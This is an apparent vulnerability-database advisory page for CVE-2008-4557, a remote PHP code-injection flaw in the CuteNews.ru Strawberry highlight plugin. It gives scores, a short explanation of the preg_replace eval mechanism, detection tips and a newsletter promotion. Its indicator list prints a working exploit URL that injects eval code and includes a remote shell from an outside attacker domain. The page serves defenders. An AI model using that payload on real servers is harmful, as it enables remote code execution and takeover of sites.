cbcvebase.
CVE-2008-4557
published 2008-10-14

CVE-2008-4557: plugins/wacko/highlight/html.php in Strawberry in CuteNews.ru 1.1.1 (aka Strawberry) allows remote attackers to execute arbitrary PHP code via the text…

PriorityP267critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
45.34%
98.6th percentile
plugins/wacko/highlight/html.php in Strawberry in CuteNews.ru 1.1.1 (aka Strawberry) allows remote attackers to execute arbitrary PHP code via the text parameter, which is inserted into an executable regular expression.

Affected

1 ranges
VendorProductVersion rangeFixed in
cutephpcutenews

Detection & IOCsextracted from sources · hover to see the quote

pathplugins/wacko/highlight/html.php
urlstrawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('blackybr.nm.ru/shell');
domainblackybr.nm.ru
commandtext=%3C!--{${eval($s)}}--%3E&s=include('blackybr.nm.ru/shell');
  • The vulnerable parameter is `text` in html.php; attacker injects PHP code wrapped in HTML comment syntax `<!--{${eval(...)}}-->` which is executed via preg_replace() with the 'e' modifier.
  • Monitor HTTP requests targeting `plugins/wacko/highlight/html.php` with a `text` parameter containing PHP eval/include payloads, especially URL-encoded `<!--{${...}}-->` patterns.
  • The exploit payload uses `include()` to pull a remote shell from an attacker-controlled domain; detect outbound PHP include/require calls to external hosts originating from the web process.
  • ·Exploitation requires `allow_url_include` (or `allow_url_fopen`) to be enabled in PHP for the remote `include()` payload to fetch the shell; environments with these disabled may still be vulnerable to local code injection via eval.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.